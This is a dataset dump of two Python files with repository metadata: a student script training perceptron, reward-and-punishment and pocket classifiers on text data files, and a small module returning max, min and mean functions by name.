L = line.split()
line_data = []
for i in range(d_feature):
line_data.append(float(L[i]))
line_data.append(int(L[d_feature]))
#print(line_data)
test_LS.append(line_data)
#__________Reward and Punishment Algorithm_________#
print("\nReward and punishment algorithm\n")
max_iteration = 1000
np.random.seed(41)
t = 0
row_not = 0.027
W = np.random.uniform(-10, 10, d_feature + 1)
print("Initial weight",W)
for itr in range(max_iteration):
count = 0
for train_data in train_LS:
class_no = train_data[-1]
X = train_data[:-1]
X.append(1)
t_data = np.array(X)
#print(X)
X =np.array(X).reshape(-1, 1)
#print(X)
mult = np.dot(W, X)[0]
#print(mult)
if mult <= 0 and class_no == 1:
W = W + row_not * np.array(t_data)
count = count + 1
elif mult > 0 and class_no == 2:
W = W - row_not * np.array(t_data)
count = count + 1
else:
pass
if count == 0:
break
print("Final weight",W)
def Testdata(test_data,weight):
accuracy_count=0
for d in test_data:
X=np.array(d)
no_class=X[d_feature]
X[d_feature]=1
X=X.reshape(d_feature+1,1)
mult=np.dot(weight,X)[0]
class_predicted=0
if mult>=0:
class_predicted=1
else:
class_predicted=2
if class_predicted==no_class:
accuracy_count=accuracy_count+1
print("Accuracy is ",float((accuracy_count/len(test_data))*100))
return float(accuracy_count)
Testdata(test_LS,W)
#_____________BASIC PERCEPTRON ALGORUTHM_______________#
print("\n\nBasic perceptron Algorithm\n")
max_iteration = 1000
np.random.seed(41)
t = 0
row_not = 0.027
W = np.random.uniform(-10, 10, d_feature + 1)
print("Initial weight",W)
for itr in range(max_iteration):
del_x=[]
Y=[]
for train_data in train_LS:
X = np.array(train_data)
#print(X)
class_no = X[d_feature]
X[d_feature] = 1
X = X.reshape(d_feature + 1, 1)
#print(X)
mult = np.dot(W, X)[0]
#print(mult)
if mult < 0 and class_no == 1:
Y.append(X)
del_x.append(-1)
elif mult > 0 and class_no == 2:
Y.append(X)
del_x.append(1)
else:
pass
summation = np.zeros(d_feature+1)
for j in range(len(Y)):
summation =summation+ del_x[j]*Y[j].transpose()[0]
W = W - row_not*summation
if len(Y) == 0:
break
print("Final weight",W)
Testdata(test_LS,W)
#__________Pocket Algorithm__________#
print("\n\nPocket algorithm\n")
input_file = open("trainLinearlyNonSeparable.txt")
input_lines = input_file.readlines()
train_NLS = []
line_count = 0
for line in input_lines:
if line_count == 0:
L = line.split()
d_feature = int(L[0])
m_class = int(L[1])
n_samples = int(L[2])
#print(L)
else:
L = line.split()
line_data = []
for i in range(d_feature):
line_data.append(float(L[i]))
line_data.append(int(L[d_feature]))
#print(line_data)
train_NLS.append(line_data)
line_count = line_count + 1
input_file = open("testLinearlyNonSeparable.txt")
input_lines = input_file.readlines()
test_NLS = []
line_count = 0
for line in input_lines:
L = line.split()
line_data = []
for i in range(d_feature):
line_data.append(float(L[i]))
line_data.append(int(L[d_feature]))
#print(line_data)
test_NLS.append(line_data)
np.random.seed(41)
t = 0
row_not = 0.027
W = np.random.uniform(-10, 10, d_feature + 1)
print("Initial weight",W)
Wp = W
M =len(test_NLS)
for itr in range(max_iteration):
del_x=[]
Y=[]
count=0
for train_data in train_LS:
X = np.array(train_data)
#print(X)
class_no = X[d_feature]
X[d_feature] = 1
X = X.reshape(d_feature + 1, 1)
#print(X)
mult = np.dot(W, X)[0]
#print(mult)
if mult < 0 and class_no == 1:
Y.append(X)
del_x.append(-1)
count=count+1
elif mult > 0 and class_no == 2:
Y.append(X)
del_x.append(1)
count=count+1
else:
pass
summation = np.zeros(d_feature+1)
for j in range(len(Y)):
summation =summation+ del_x[j]*Y[j].transpose()[0]
W = W - row_not*summation
if count<M:
M=count
Wp=W
if count == 0:
break
print("Final weight",Wp)
Testdata(test_NLS,Wp)
| [
"[email protected]"
] | |
5ffa1358609b67c52360b1bab4f76c8dc2094062 | 9c18ba32a6d927cf12b79f8ac96a1a2918e5564e | /funciones1nivelReturn.py | 2db532de9bcfd97b53c5b8bc5d36166c9daccad0 | [] | no_license | formesdesign/m02_bootcamp | e96105d276fc67e885ca7df85232594a57d8ab7a | 7b0e7f3f04dca9fcd44057d8cb514f3b8fe77d73 | refs/heads/main | 2022-12-29T01:46:36.239357 | 2020-10-17T10:59:36 | 2020-10-17T10:59:36 | 303,087,266 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 849 | py | #*l elemtos d'una rai
def maxi(*l):
if len(l) ==0:
return 0
m = l[0]
for ix in range(1, len(l)):
if l[ix] > m:
m = l[ix]
return m
def mini(*l):
if len(l) ==0:
return 0
m = l[0]
for ix in range(1, len(l)):
if l[ix] < m:
m = l[ix]
return m
def media(*l):
if len(l) ==0:
return 0
suma = 0
for valor in l:
suma += valor
return suma / len(l)
#diccionari + crear una funció de primer nivell
#esta funció retorna el que li demanem de les funcions de dalt
funciones = {
"max": maxi,
"min": mini,
"med": media
}
def returnF(nombre):
nombre = nombre.lower()
if nombre in funciones.keys():
return funciones[nombre]
return None | [
"[email protected]"
] |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.